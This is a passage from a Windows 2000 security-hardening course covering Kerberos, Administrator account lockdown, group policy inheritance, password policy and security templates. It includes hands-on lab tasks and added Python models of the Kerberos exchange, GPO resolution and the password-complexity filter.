The Ticket Granting Server (TGS) is what creates the actual tickets for the client to use in accessing authorized resources. In a Windows 2000 implementation, this is configured as a service called the Ticket Granting Service. The Kerberos Key Distribution Center (KDC) in a Windows 2000 implementation contains both the Authentication Service and the Ticket Granting Service.
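The following is an added example, not code from the course and not the Windows 2000 KDC, that makes the AS / TGT / TGS sequence above concrete. One object plays the KDC with both its Authentication Service and Ticket Granting Service; a client authenticates, receives a TGT, uses it to obtain a ticket for a file service, and the service verifies that ticket with its own key and no KDC round trip. The seal/unseal routine is a toy authenticated cipher (SHA-256 keystream plus HMAC) standing in for Kerberos encryption types, PBKDF2 stands in for the string-to-key function, and the realm, user and service names are constructed.

```python
# Added example, not from the course and not the Windows 2000 KDC code: a runnable
# model of the ticket exchange described in the text. One object plays the KDC with
# its Authentication Service (AS) and Ticket Granting Service (TGS); a client gets a
# TGT, uses it to get a service ticket, and a service verifies that ticket with its
# own key. seal/unseal is a toy authenticated cipher (SHA-256 keystream + HMAC)
# standing in for Kerberos encryption types, PBKDF2 stands in for string-to-key,
# and the realm, user and service names are constructed sample data.
import hashlib
import hmac
import json
import os
import time

PREAUTH_SKEW = 300      # seconds of clock skew accepted on the pre-auth timestamp
TGT_LIFETIME = 600      # seconds a TGT stays valid in this model


def derive_key(password: str, salt: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 10_000)


def _xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
        out += bytes(p ^ k for p, k in zip(data[i:i + 32], block))
    return bytes(out)


def seal(key: bytes, obj: dict) -> bytes:
    """Toy encrypt-then-MAC of a JSON object."""
    nonce = os.urandom(16)
    body = nonce + _xor_stream(key, nonce, json.dumps(obj, sort_keys=True).encode())
    return body + hmac.new(key, body, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> dict:
    """Raises ValueError when the key is wrong or the blob was altered."""
    body, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, body, hashlib.sha256).digest(), tag):
        raise ValueError("bad key or tampered message")
    return json.loads(_xor_stream(key, body[:16], body[16:]))


class KDC:
    """AS and TGS together, as the Windows 2000 KDC service combines them."""

    def __init__(self, realm: str, users: dict, services: dict):
        self.realm = realm
        self.user_keys = {u: derive_key(p, realm + u) for u, p in users.items()}
        self.service_keys = {s: derive_key(p, realm + s) for s, p in services.items()}
        self.tgs_key = os.urandom(32)             # only the KDC can open a TGT

    def as_exchange(self, user: str, preauth: bytes):
        """AS: the client proves its password by sealing a timestamp under its
        long-term key; the reply is a TGT plus a session key only that key opens."""
        ts = unseal(self.user_keys[user], preauth)["ts"]   # wrong password -> ValueError
        if abs(time.time() - ts) > PREAUTH_SKEW:
            raise ValueError("pre-authentication timestamp out of range")
        session = os.urandom(32).hex()
        tgt = seal(self.tgs_key, {"user": user, "session": session,
                                  "exp": time.time() + TGT_LIFETIME})
        return tgt, seal(self.user_keys[user], {"session": session})

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, service: str):
        """TGS: open the TGT, check the authenticator under the TGT session key,
        then issue a ticket sealed with the service's own key."""
        t = unseal(self.tgs_key, tgt)
        if t["exp"] < time.time():
            raise ValueError("TGT expired")
        if unseal(bytes.fromhex(t["session"]), authenticator)["user"] != t["user"]:
            raise ValueError("authenticator does not match the TGT")
        svc_session = os.urandom(32).hex()
        ticket = seal(self.service_keys[service], {"user": t["user"], "session": svc_session})
        return ticket, seal(bytes.fromhex(t["session"]), {"session": svc_session})


def client_logon(kdc: KDC, user: str, password: str):
    """Logon: authenticate to the AS and recover the TGT session key."""
    key = derive_key(password, kdc.realm + user)
    tgt, enc = kdc.as_exchange(user, seal(key, {"ts": time.time()}))
    return tgt, unseal(key, enc)["session"]


def client_service_ticket(kdc: KDC, user: str, tgt: bytes, session: str, service: str):
    """Present the TGT to the TGS and get a ticket for one network service."""
    authenticator = seal(bytes.fromhex(session), {"user": user, "ts": time.time()})
    ticket, enc = kdc.tgs_exchange(tgt, authenticator, service)
    return ticket, unseal(bytes.fromhex(session), enc)["session"]


def service_accepts(service_key: bytes, ticket: bytes) -> str:
    """The service needs no KDC round trip: its own key opens the ticket."""
    return unseal(service_key, ticket)["user"]
```

Two properties worth noticing in the model: a wrong password is rejected by the AS before any TGT exists, and the service never sees the user's password or long-term key, only a ticket it can open with its own key, which is what makes the single sign-on described next possible.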

One of the benefits to end-users of a network running Kerberos is that Single Sign On (SSO) can be maintained. With SSO, users are not required to authenticate with each network resource they want to access, and because Windows 2000 trusts are transitive, once a user logs on to one domain he or she will have access to the other domains in the forest. Another key benefit of Kerberos is that it has a mechanism for verifying the identity of the user, not just authentication. This means that in a Kerberos network, if a message says it came from User A, you can be very confident it did indeed come from User A.

Smart Cards in Windows 2000

With the release of Windows 2000, Microsoft included built-in support for Smart Cards. Smart Cards allow for a physical component of authentication, which provides an additional layer of defense for the system.

Smart Cards in Windows 2000 utilize Kerberos and public key cryptography. Public key cryptography is asymmetric cryptography, meaning that there is one key for encryption and a different key for decryption. When grouped together, the two are called the private/public key pair, or simply the key pair. The private key is known only to the owner and is never shared with the world. The public key is known to the world; it is publicly available. When Smart Cards are deployed in place of a password, the key pair is stored on the card.

TASK 4B-1

Configuring NTLMv2 Authentication

Setup: You are logged on to Windows 2000 as Administrator, and the Custom_GPO is open.
1. Under Security Settings, expand Local Policies, and select Security Options.
2. Double-click LAN Manager Authentication Level.
3. In the Local Policy Setting drop-down list, select Send NTLMv2 Response Only, and click OK.
4. Close the Custom_GPO, saving settings if you are prompted to do so. If you have authentication issues in later tasks, you can return the setting to Send LM And NTLM Responses.

Topic 4C
Windows 2000 Security Configuration Tools

In Windows 2000, you are provided with a variety of tools and resources for the configuration and management of security options, for both individual computers and the network itself. These tools include the Security Templates Snap-In, the Security Configuration and Analysis Snap-In, and Secedit.exe. Secedit.exe is a command-line tool that can be used, among other things, for analyzing the security of many computers in a domain.

The Gold Standard

When configuring Windows 2000 to be a secure operating system, you will have many choices and configuration options. There are several different templates you can implement, as you will see shortly. In addition to the templates provided by Microsoft, there are other standards created by different organizations for securing the system. One of these standards is the Gold Standard. The Gold Standard was jointly developed by several organizations, including the NSA and NIST. In this section, you will see references to the Gold Standard, and you will use the Gold Standard template to check the security of your system against the recommendations.

User and Group Security

The focal point of Windows 2000 is just as it was in Windows NT 4.0: the users. Without users being able to access the network, there is no point in having a network. The creation of user accounts is something all Windows administrators must become familiar with, if they are not already.

There are two basic types of user accounts that can be created in Windows 2000: domain users and local users. A domain user account has the ability to log on to the network and access authorized resources throughout the domain. A local user account has the ability to log on to a specific computer and access authorized resources on that computer.

The accounts that exist when a Windows 2000 server is first installed are the Guest and Administrator accounts. Securing the Guest account should happen right away. The same steps that are used to secure the Guest account in Windows NT 4.0 can be used to secure this account in Windows 2000.

Restricting Logon Hours

Once you have created several user accounts, you should look into restricting the hours in which a user may log on successfully. This is one of the most significant configurations in terms of securing user accounts. If your network is to provide access only during working hours, there is no reason to allow a user account 24x7 access to the network.

Unfortunately, with Windows 2000 Server, restricting logon hours can be done only for Domain (AD) users; however, the procedure for doing so is included here for your reference.
1. Open the MMC, and add the Active Directory Users And Computers Snap-in.
2. Select the Users folder, and double-click a User object that you want to restrict.
3. In the Properties dialog box, select the Account tab, and click Logon Hours.
4. Specify the necessary time and day restrictions.
5. Click OK to close the Logon Hours dialog box.
6. Click OK to close the User Properties and apply the changes.

Expiration Dates for User Accounts

In addition to setting restrictive hours for a user account, you can control access to network resources by defining a time limit for a user account. In other words, you are creating a user account that will expire.

Again, in Windows 2000 Server, this restriction is available only for Domain (AD) users. Here is the procedure, for your reference.
1. Open the MMC, and add the Active Directory Users And Computers Snap-in.
2. Select the Users folder, and double-click a User object that you want to restrict.
3. In the Properties dialog box, select the Account tab.
4. For the Account Expires option, select the End Of radio button, and enter the date on which you want the account to expire.
5. Click OK to close the User Properties and apply the settings.

Configuring Windows 2000 Groups

As you begin working with Windows 2000, you will most likely want to implement and configure a full Active Directory structure, to gain all the benefits afforded by doing so. However, when you first install a server, it is nothing more than a stand-alone server, not even part of a domain, let alone a domain controller.

After the machine has become a domain controller (you can do this by running DCPROMO), you will find that, as the administrator, there are several groups for you to manage. These groups include the Domain Administrators and Domain Users.

There are two basic group types: a Security group and a Distribution group. The Distribution group is used to manage lists, such as email lists, and will not be detailed in this course. We will focus on Security groups. These groups can contain users and other security groups, so there is quite a bit of flexibility in managing the network.

In Windows NT 4.0, you will recall that groups can be either global or local. In Windows 2000, that concept is expanded into the following group scopes:

Computer Local: A machine-specific group used to provide access to resources on the local machine only. It cannot be created on a Domain Controller.

Domain Local: A group that can have members from any domain in the network. These groups are created only on Domain Controllers, and can be used to provide resource access throughout the domain.

Global: A group that is used to combine users who often have similar use and access requirements for network resources. Global groups can contain members from the domain in which the group was created and can be used to access resources in that domain as well as in other domains.

Universal: Used in a multidomain environment where groups of users from different domains have similar resource use and access needs. In order to implement Universal groups, the network must be running in native mode, meaning only Windows 2000 Domain Controllers are being used. This switch is usually made when all Windows NT 4.0 Domain Controllers have been upgraded to Windows 2000.

It is also possible to combine groups together, such as nesting Global groups in Universal groups, if that is required in your situation. There might be a resource you are trying to control access to, and several Global groups might exist that are already configured with the correct users. In this case, a Universal group will work for controlling access across the network. You can also place Universal groups in Domain Local groups and control access to the resource by placing permissions on the Domain Local group.

These groups are what you will use when controlling access to resources, both allowing and denying permissions based on your security needs. If you are trying to secure the computer, user, and network environments, you will use group policies, as introduced earlier.

Locking Down the Administrator Account

The Administrator account has four significant facts, from a security perspective:
1. The name of the built-in administrator account is Administrator.
2. This built-in administrator account is a member of the built-in Administrators group.
3. The built-in administrator account cannot be locked out.
4. This account can, during the installation process, be created with a blank password.

The chances are extremely high that anyone familiar with the Windows platform also knows these facts. Therefore, the first priority for you, as an administrator, should be to change the name of the built-in administrator account to something that does not sound so administrative and associate it with a very strong password.

You should also prohibit this account from logging on to this computer over the network. This might sound a bit counter-intuitive until you realize that this account will not get locked out, regardless of how strict an account lockout policy you use; for instance, if you implement an account lockout policy that locks out a user account after three bad logon attempts, then all accounts other than the built-in administrator account will obey this policy. Now, in most organizations, important machines, such as file, print, authentication, Web, mail, and FTP servers, are typically housed in physically secure locations. Only network administrators are allowed into these areas. (If this is not the case in your organization, we recommend you start thinking hard about it.) If you can ensure physical security, then the only other way the servers can be attacked is via the network. The most powerful account on a server is the Administrator account. Attacks on an administrator account can be guarded against by implementing a lockout policy, except, of course, for the built-in one. Therefore, it is recommended that this account not have the right to log on via the network.

physical security: The measures used to provide physical protection of resources against deliberate and accidental threats.

TASK 4C-1

Securing Administrator Account Access

Setup: You are logged on to Windows 2000 as Administrator.
1. Right-click My Computer, and choose Manage.
2. In the left pane, expand Local Users And Groups, and select the Users folder.
3. In the right pane, right-click the built-in administrator account (called Administrator) and choose Rename.
4. For the new account name, enter scnpXXX, where XXX is your seat number, such as L01 or R02. The last three letters of your computer name should be your seat number. If you are unsure about your computer name, right-click My Computer and choose Properties, then click Network Identification. Your computer name will be listed for you. Or, you can open a command prompt and enter the ipconfig /all command; your host name is your computer name.
5. Right-click the scnpXXX account and choose Set Password.
6. Enter and confirm aA1234! and click OK twice.
7. In the right pane, right-click anywhere and choose New User.
8. For the new account name, enter Administrator to create a new account that looks like it is the built-in administrator account.
9. Enter the password bB5678! and confirm it.
10. Uncheck User Must Change Password At Next Logon.
11. Check User Cannot Change Password and Password Never Expires. Click Create, and then click Close to finish creating the new account.
12. Right-click the new account that you just created, and choose Properties.
13. Select the Member Of tab.
14. Select the Users group and click Remove.
15. Click Apply, and then click Close.
16. In the right pane, right-click anywhere and choose New User.
17. For the new account name, enter scnpXXXb, and for the password, enter cC13579! and confirm it. Again, use your seat number in place of the Xs.
18. Uncheck User Must Change Password At Next Logon.
19. Click Create, and then click Close.
20. Right-click the new account that you just created, and choose Properties.
21. Select the Member Of tab.
22. Click the Add button, select the Administrators group, click Add, and click OK.
23. Select the Users group and click Remove.
24. Click Apply, and then click Close.
25. Open the Custom_GPO. If necessary, expand Local Computer Policy, Computer Configuration, Windows Settings, Security Settings, and Local Policies. Select User Rights Assignment.
26. In the right pane, locate and double-click the policy Deny Access To This Computer From The Network.
27. Click Add, then while holding down the Ctrl key, select the user accounts scnpXXX and Administrator. Click Add.
28. Click OK twice.
29. Double-click the policy Deny Logon Locally.
30. Click the Add button, select the user account Administrator, and click Add.
31. Click OK twice.
32. Close all windows. Save settings if you are prompted to do so.

Testing Administrative Access

You have renamed the built-in administrator account and configured it to be used only at the machine and not over the network. You have also created a dummy Administrator account that cannot log on locally, nor can it be used to access this machine over the network. And, you have created another administrator account. This is the administrator account that you should use on a day-to-day basis, as and when required; not the built-in account. Now, let's test the results of denying network access to this server for the built-in administrator account. We will create a folder and share it. Then we will configure this folder's share permissions to allow Read access for the built-in administrator account. Finally, we will test this access from another machine on the network.

TASK 4C-2

Testing Administrative Access

Setup: You are logged on to Windows 2000 as Administrator.
1. Log off and try to log back on as Administrator. You should see a message stating that the local policy does not permit this account to log on. (Remember, you set a password for Administrator: bB5678!)
2. Try to log on with the renamed Administrator account. This time, you should be able to log on successfully.
3. On your boot partition, create a folder called Newtest, and within this folder, create a text file named doc1.txt. Your boot partition is the partition that contains the Windows 2000 OS files.
4. Right-click the new folder, and choose Sharing.
5. Select Share This Folder, and click the Permissions button.
6. Select Everyone and click Remove.
7. Click the Add button, select the user accounts scnpXXX and scnpXXXb, and click Add. Then click OK three times.
8. From your neighbor's computer, open the Run dialog box. (From the Start menu, choose Run.)
9. Enter \\your_computers_IP_address\newtest. You should receive a dialog box prompting you for a username and password. (Remember to include the computer name; for instance, STU-W2K-L01\scnpl01.)
10. Enter the name and password for the built-in administrator account. Remember, you changed the built-in administrator account to scnpXXX, with a password of aA1234!.
11. If you are prompted for credentials a second time, enter the same information. You should receive a pop-up error message informing you that a logon failure occurred as the user has not been granted the requested logon type at this computer.
12. Click OK to close the error message.
13. This time, try logging on with the credentials for scnpXXXb. You should be successful.
14. Return to your own computer, and close any open windows.

Group Policies

In the previous section, you were introduced to Group Policy Objects and their creation. In this section, you will delve deeper into the usage of the GPO in securing the network. Two of the issues that must be discussed are the options associated with policy inheritance and overrides.

From the earlier discussion on Group Policy Objects, you should already be aware that the GPOs are implemented in the following order: local GPO, site GPO, domain GPO, and finally OU GPO. You are also aware of the fact that when there are multiple GPOs assigned to an object, the highest GPO on the list takes priority over the rest of the list.

You can change the order of implementation on this list by simply choosing a GPO and using the Up and Down buttons to reorder the list to suit your needs. However, you might need to have further control than what the Up and Down buttons provide to you.

Policy Inheritance

Policy inheritance is the name for the process of a user or computer inheriting the final policy configuration from multiple policies, depending on where the object is in the Active Directory hierarchy and which GPOs are configured. To track the policies that might be implemented as a user logs on to a computer, use the following list:
1. A computer policy is enabled when the computer is first turned on, and is refreshed at default intervals.
2. A user policy is applied when a user logs on to the system and is refreshed at default intervals.
3. The local GPO is applied.
4. The site GPO is applied.
5. The domain GPO is applied.
6. The OU GPO is applied.

To keep this complexity in mind, remember that it is not uncommon for sites, domains, and OUs to have more than one GPO configured. It is also not uncommon for there to be conflicting settings in locations throughout the policies.

No Override

One of the methods for you to manage a GPO implementation is through the No Override option. This option is available on any site, domain, or OU GPO. When selected, this option means that none of the policy settings in this GPO can be overridden. In the event that more than one GPO is set to No Override, the highest GPO takes priority.

Block Inheritance

In addition to the No Override option, you have another choice for managing policy implementation. The other choice is called Block Policy Inheritance. This option is also available to any site, domain, or OU GPO. When selected, this option means that any policy that is higher will not be inherited, unless it has been designated with the No Override option. Enabling this option ensures that the settings of the current GPO will be implemented and not the policies of a higher-priority policy. You must be very careful in the use of the No Override and Block Inheritance options. These choices, used with incomplete planning, can cause serious disruptions to the overall policies that are implemented throughout the organization.
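The following is an added example, not from the course and not Microsoft's policy engine, that models how the final settings are resolved from the chain described above (local, site, domain, OU, with the highest link in a container winning) once No Override and Block Inheritance are in play. It goes a little beyond the text by handling a whole chain with several GPOs per container. The GPO, container and setting names are constructed, and one simplification is assumed: the local GPO is treated like any other link at the bottom of the chain.

```python
# Added example (not from the course): a small model of how the settings a
# computer or user finally receives are resolved from the GPO chain described in
# the text (local, site, domain, OU), including No Override and Block Inheritance.
# GPO, container and setting names are constructed. Simplification (assumption):
# the local GPO is treated like any other link at the bottom of the chain.
from dataclasses import dataclass, field


@dataclass
class GPO:
    name: str
    settings: dict                 # policy name -> value
    no_override: bool = False      # "No Override" set on this GPO link


@dataclass
class Container:
    name: str                      # "Local", "Site:...", "Domain:...", "OU:..."
    gpos: list = field(default_factory=list)   # link order: index 0 is the highest
    block_inheritance: bool = False


def resolve(chain: list) -> dict:
    """chain runs from local to the OU closest to the object.
    Returns {setting: (value, name of the GPO it came from)}."""
    effective = {}
    # Pass 1: ordinary inheritance. Containers later in the chain overwrite earlier
    # ones; inside one container the highest link wins, so apply links bottom-up.
    # A container with Block Inheritance discards everything inherited so far.
    for container in chain:
        if container.block_inheritance:
            effective = {}
        for gpo in reversed(container.gpos):
            if not gpo.no_override:
                for setting, value in gpo.settings.items():
                    effective[setting] = (value, gpo.name)
    # Pass 2: No Override GPOs are applied last and cannot be blocked. Walk upward
    # so that, between two No Override GPOs, the higher one ends up winning.
    for container in reversed(chain):
        for gpo in reversed(container.gpos):
            if gpo.no_override:
                for setting, value in gpo.settings.items():
                    effective[setting] = (value, gpo.name)
    return effective


def sample_chain() -> list:
    """Constructed scenario: a domain baseline marked No Override, a site GPO,
    and a server OU that blocks inheritance."""
    return [
        Container("Local", [GPO("LocalPolicy", {"LmCompatibilityLevel": 0})]),
        Container("Site:HQ", [GPO("Site-Audit", {"AuditLogonEvents": "Success,Failure"})]),
        Container("Domain:corp", [
            GPO("Domain-Baseline",
                {"LmCompatibilityLevel": 3, "RenameAdministratorAccount": "scnpAdmin"},
                no_override=True),
            GPO("Domain-Extra", {"LmCompatibilityLevel": 2}),
        ]),
        Container("OU:Servers",
                  [GPO("Server-Lockdown",
                       {"LmCompatibilityLevel": 5, "AuditLogonEvents": "Failure"})],
                  block_inheritance=True),
    ]


if __name__ == "__main__":
    for setting, (value, source) in sorted(resolve(sample_chain()).items()):
        print(f"{setting:28} = {value!s:18} (from {source})")
```

In the sample, the server OU's own LmCompatibilityLevel of 5 loses to the domain baseline's 3, because No Override beats both the OU's later position and its Block Inheritance; the site's audit setting, by contrast, is blocked, so it never reaches the servers.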

Local Security Policy

Ed
T DU

Each and every Windows 2000 system on the network has what is called a local security policy. The local security policy is the grouping of security congurations that affect the local computer. These security congurations can dene users and groups rights and permissions, along with determining machine specic security settings. In the following tasks, you will congure local security policy settings.

TASK 4C-3
Verifying Password Requirements

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open the Computer Management (Local) console.
2. Create three users named poluser1, poluser2, and poluser3.
3. Leave this console open.
4. From the Start menu, choose Programs→Administrative Tools→Local Security Policy.
5. Expand Account Policies, and select Password Policy.
6. In the right pane, double-click the Minimum Password Length policy.
7. Change the value for Password Must Be At Least to 4 characters, and click OK.
8. Leave the Local Security Settings MMC open.
9. Switch to the Computer Management (Local) console.
10. Right-click poluser1, and choose Set Password.
11. Enter 123 as the password, and confirm it.
12. Click OK. You should be presented with a pop-up warning informing you that an error occurred while attempting to set the password for that user. The new password (123) does not meet the password policy requirements.
13. Click OK to close the warning, and then set poluser1's password to 1234. The password should now be accepted. Click OK.
14. Switch to the Local Security Settings MMC.
15. Double-click the Passwords Must Meet Complexity Requirements policy.
16. Change the setting for this policy to Enabled, and click OK.
17. Switch to the Computer Management MMC.
18. Right-click poluser2, and set the password to 1234.
19. Click OK. You should be presented with a pop-up warning informing you that an error occurred while attempting to set the password for that user. The new password (1234) does not meet the password policy requirements.
20. Click OK to close the warning, and then try setting the password to a123.
21. Click OK. You should again be presented with a pop-up warning informing you that an error occurred while attempting to set the password for that user. The new password (a123) still does not meet the password policy requirements. Let's try again.
22. Click OK to close the warning, and then try aA12 as the password.
23. Click OK. This time, the password should be accepted.
24. Click OK, and close all open windows.

Lesson 4: Hardening Windows Computers

Password Recommendations

A password that mixes upper- and lowercase letters with digits already satisfies the complexity requirement as Microsoft's policy designers defined it, because the filter only demands characters from three of its four classes (uppercase letters, lowercase letters, digits, and non-alphanumeric characters) and rejects passwords that contain the account name. Interestingly, if you search for the definition of this policy in Microsoft's TechNet, you will be provided information similar to what is shown in Figure 4-8.

Figure 4-8: A TechNet description of password complexity requirements.

The description states a six-character minimum, yet simply turning this policy on does not force users to use at least six characters; you have already proved this, since aA12 was accepted once the minimum length was 4. Nor do users have to enter any non-alphanumeric characters: upper- and lowercase letters plus digits are enough. Two practical consequences follow. The length of passwords is governed only by the Minimum Password Length policy, so set it explicitly (the Gold Standard value used later in this lesson is 8). And the filter is applied only at the moment a password is set or changed, so passwords that already exist are not revisited until they are next changed.
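The three-of-four-classes rule described above, as an added example that is not part of the course material: a Python model of the Windows 2000 complexity filter combined with the Minimum Password Length check, run over the passwords tried in the task. The account name poluser2 and the delimiter set used to split the full name are assumptions for illustration; the filter's own rules are the documented ones.

```python
"""Model of the Windows 2000 'Passwords must meet complexity requirements' filter.

Added example; not code from the course. The rules modelled are the documented
ones: a password passes if it contains characters from at least three of four
classes (uppercase, lowercase, digits, non-alphanumeric) and does not contain
the account name or any part of the full name longer than two characters.
The filter imposes no length of its own; length comes from the separate
Minimum Password Length policy, so both are checked together here.
"""
import re
from typing import List


def _full_name_parts(full_name: str) -> List[str]:
    """Tokens of the full name longer than two characters, split on the
    delimiters assumed here (space, comma, period, hyphen, underscore, #, tab)."""
    return [p for p in re.split(r"[ ,.\-_#\t]+", full_name) if len(p) > 2]


def meets_complexity(password: str, account_name: str = "", full_name: str = "") -> bool:
    """The complexity filter alone: three of four classes, no name parts (case-insensitive)."""
    lowered = password.lower()
    if account_name and account_name.lower() in lowered:
        return False
    if any(part.lower() in lowered for part in _full_name_parts(full_name)):
        return False
    classes = (
        any(c.isupper() for c in password),      # A-Z
        any(c.islower() for c in password),      # a-z
        any(c.isdigit() for c in password),      # 0-9
        any(not c.isalnum() for c in password),  # punctuation and symbols
    )
    return sum(classes) >= 3


def check_password(password: str, min_length: int, complexity_enabled: bool,
                   account_name: str = "", full_name: str = "") -> List[str]:
    """Apply the password policy as Windows does when a password is set or changed.
    Returns the reasons for rejection; an empty list means the password is accepted."""
    reasons = []
    if len(password) < min_length:
        reasons.append(f"shorter than Minimum Password Length ({min_length})")
    if complexity_enabled and not meets_complexity(password, account_name, full_name):
        reasons.append("does not meet complexity requirements")
    return reasons


if __name__ == "__main__":
    # The passwords tried in the task, under the policy in force at each step.
    trials = [
        ("123", 4, False), ("1234", 4, False),                    # before complexity was enabled
        ("1234", 4, True), ("a123", 4, True), ("aA12", 4, True),  # after it was enabled
        ("aA12", 8, True),                                        # with the Gold Standard length
    ]
    for pw, length, cplx in trials:
        verdict = check_password(pw, length, cplx, account_name="poluser2")
        print(f"{pw!r:8} min={length} complexity={cplx}: {verdict or 'accepted'}")
```

The model shows why the task behaved as it did: 1234 and a123 fail because they contain only one and two character classes, while aA12 passes with three. It also shows that the filter by itself accepts a three-character password such as Ab1, which is why Minimum Password Length must be set separately.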

Security Templates

The prospect of configuring all the options in a GPO can be overwhelming. To help with defining how security should be configured for a given situation, Microsoft includes security templates that can be used with the Group Policy editor. These templates are INF files (plain text organized into sections such as [System Access], [Registry Values], and [Privilege Rights]) and can be opened with a text editor for viewing. Templates are stored in the %systemroot%\security\templates folder. A template can be imported into a GPO (right-click Security Settings in the Group Policy editor and choose Import Policy), and any user or computer controlled by that GPO will be affected by the settings in the template. Each template is a set of pre-configured options intended for a given scenario. Microsoft has included a set of templates designed to cover most of the standard scenarios. You can use the templates as-is or modify them to suit your needs, and you can also create new templates from scratch so that they are fully customized for your situation. Two cautions apply. Templates are incremental: settings a template does not define are left as they are, so importing a template does not undo every change an earlier one made. And because the text format is easy to edit, keep templates under change control and verify a template with an analysis run before configuring a production system with it.

Predefined Security Templates

Some of the common security templates that are built into the system are:

BASICDC.INF: This template configures default Domain Controller security settings.
BASICSV.INF: This template configures default server security settings.
BASICWK.INF: This template configures default workstation security settings.
COMPATWS.INF: This template configures compatible workstation or server security settings.
SECUREWS.INF: This template configures secure workstation or server security settings.
SECUREDC.INF: This template configures secure Domain Controller security settings.
HISECWS.INF: This template configures highly secure workstation security settings.
HISECDC.INF: This template configures highly secure Domain Controller security settings.
SETUP SECURITY.INF: This template configures out-of-the-box default security settings, including the file system and Registry permissions applied during installation.

As you can see, there are several general security levels in the templates: basic, compatible, secure, and highly secure. The following defines the general purpose and function of each of the security levels.

The basic templates (BASIC*.INF) allow an administrator to reverse an earlier implementation of a security configuration by reapplying the Windows 2000 defaults. They are not designed as a complete reversal of security configurations on a system, however: they configure the default settings for every area except user rights, which are left alone so that rights granted to application accounts are not removed.

The compatible templates (COMPAT*.INF) are typically used only in mixed environments where legacy or non-certified applications must run. Rather than making ordinary users members of Power Users (the Windows NT 4.0 style approach), these templates relax the default file and Registry permissions for the Users group so that such applications work, and they remove all members from the local Power Users group.

The secure templates (SECURE*.INF) configure security settings for the entire system, but not the permissions on files, folders, and Registry keys. Those areas are not addressed because the default security in place for those objects is considered adequate.

The highly secure templates (HISEC*.INF) are used to secure network communications on Windows 2000 computers: they require SMB signing and NTLMv2-level authentication so that traffic sent to and from the machine is protected. As a consequence, a computer configured with a HISEC template can communicate only with other Windows 2000 computers (or with clients that have been configured for the same settings), so test before deploying on a network that still has Windows 9x or Windows NT 4.0 hosts.

Another type of preconfigured template is the Dedicated Domain Controller template (DEDICADC.INF). As the name implies, it is used to secure a machine running only as a Domain Controller. By default the security on a DC is relaxed to allow legacy applications to run, so it is not as secure as it could be. If your DC is not required to run any of these programs, it is suggested that the Dedicated DC template be implemented.

security level: The combination of a hierarchical classification and a set of non-hierarchical categories that represents the sensitivity of information.

Another predefined template, one that is very important today but is not included with the other preconfigured templates, is HISECWEB.INF. This template is designed to configure an IIS 5.0 machine running the HTTP service. Although it is not in the default list, it can be downloaded free, directly from Microsoft, at http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316347&, which is the URL for the Microsoft article "IIS 5: HiSecWeb Potential Risks and the IIS Lockdown Tool" (Q316347). Applying HISECWEB.INF should be part of the baseline for any IIS 5.0 web server you need to lock down, but read the article first: as its title says, the template's settings can break some configurations (for example, through the services it disables), so test it against a copy of the site before using it in production, and combine it with the IIS Lockdown Tool rather than treating either as sufficient on its own.

TASK 4C-4
Analyzing Default Password Settings of Security Templates

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open an empty MMC.
2. Choose Console→Add/Remove Snap-in.
3. Add the Security Templates snap-in.
4. Expand the templates and review the password policies for Basicsv, Hisecdc, and Securedc. Observe the password definitions of each template.
5. Leave the MMC open for the next task.

Custom Security Templates

As you can see from this short example, the templates provide a range of configured settings; in this case, passwords are managed differently depending on the situation. If a security template does not quite fit your needs, you can modify its settings. If you would need to modify a great deal of the template, it might be easier to create a new template altogether.

TASK 4C-5
Creating a Custom Security Template

Setup: You are logged on to Windows 2000 as the renamed Administrator account. The MMC is open, and the Security Templates snap-in has been added.

1. If necessary, expand Security Templates to reveal all of the templates.
2. Right-click the directory location of the templates (such as C:\WINNT\Security\Templates), and choose New Template.
3. Name your template Custom Password Config.
4. Use the description Template specifying highly secure passwords.
5. Click OK to create a blank template.
6. Configure your template to use the following settings:
a. Enforce Password History: 24 passwords
b. Maximum Password Age: 20 days (accept the suggested value for Minimum Password Age)
c. Minimum Password Age: 5 days
d. Minimum Password Length: 14 characters
e. Account Lockout Threshold: 3 invalid logon attempts
f. Reset Account Lockout Counter After: 120 minutes
g. Account Lockout Duration: 0 minutes (accept the suggested settings)
7. Right-click the new template, and choose Save.
8. Leave the MMC open for the next task.

Note that a lockout duration of 0 means a locked-out account stays locked until an administrator unlocks it. Combined with a threshold of 3, anyone who can reach the logon interface can lock users out deliberately, so this combination suits a lab more than a production network.

Security Configuration and Analysis Snap-In

Once you have created a policy or made changes to a predefined template, you will likely want to apply it. As mentioned earlier, templates can be applied to (imported into) GPOs. Applying a template to the local computer is a straightforward procedure and uses the Security Configuration and Analysis snap-in.

Another of the advances in security management provided by Windows 2000 is the Security Configuration and Analysis snap-in of the MMC. With this tool, you can implement templates and configure the security of your system. In addition to implementation, the tool allows for a complete security analysis of the operating system.

The tool takes the security settings of a template, stores them in a database (an .sdb file), and compares those settings to the current configuration of the operating system. During this analysis, it differentiates between items that are in compliance with the settings and items that are not. Items in compliance are highlighted with a green check mark, items not in compliance are highlighted with a red X, and items the template does not define carry no mark at all, so the absence of a red X does not by itself mean a setting has been reviewed.

TASK 4C-6
Investigating the Security Configuration and Analysis Snap-In

Setup: You are logged on to Windows 2000 as the renamed Administrator account. The MMC is open, and the Security Templates snap-in has been added.

1. Add the Security Configuration and Analysis snap-in to the MMC.
2. Right-click the Security Configuration and Analysis snap-in, and choose Open Database.
3. For the filename, enter Password_Check.sdb, and click Open. Because there is no New option, this step creates the new file.
4. From the template list, select your Custom Password Config template, and click Open.
5. Right-click the Security Configuration and Analysis snap-in, and choose Analyze Computer Now. Accept the default path for error log messages, and click OK.
6. Once the analysis is finished, expand the Security Configuration and Analysis snap-in, and examine whether or not your system is up to policy in regard to passwords.
7. Leave the MMC and snap-in open for the next task.

Template Implementation

Once you have a configuration you are ready to implement, you can do so with the Security Configuration and Analysis tool as well. Be aware that a template implementation can take a bit of time, because file and Registry permissions may have to be written to thousands of objects. The process itself is quite straightforward.

There are two general timers associated with policy implementation. By default:

